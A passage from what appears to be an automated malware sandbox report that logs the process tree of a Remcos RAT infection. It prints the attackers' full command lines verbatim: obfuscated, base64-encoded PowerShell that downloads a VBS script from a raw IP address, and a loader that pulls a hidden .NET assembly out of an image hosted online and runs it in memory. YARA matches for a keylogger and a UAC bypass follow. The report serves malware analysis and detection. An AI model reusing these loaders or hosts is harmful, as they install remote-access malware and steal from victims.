                                              Commandline:poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                                              Imagebase:0x13faa0000
                                              File size:443'392 bytes
                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:11:49:01
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"
                                              Imagebase:0x13f380000
                                              File size:2'758'280 bytes
                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:11:49:02
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP"
                                              Imagebase:0x13fa10000
                                              File size:52'744 bytes
                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:11:49:06
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS"
                                              Imagebase:0xffea0000
                                              File size:168'960 bytes
                                              MD5 hash:045451FA238A75305CC26AC982472367
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:11:49:07
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UgBF? ? ? ? ?EM? ? ? ? ?UwBS? ? ? ? ?E4? ? ? ? ?Lw? ? ? ? ?w? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?y? ? ? ? ?C4? ? ? ? ?Nw? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?1? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?O? ? ? ? ?? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                              Imagebase:0x13faa0000
                                              File size:443'392 bytes
                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:11:49:07
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                              Imagebase:0x13faa0000
                                              File size:443'392 bytes
                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:11:49:13
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:11:49:13
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:11:49:13
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              General

                                              Target ID:19
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
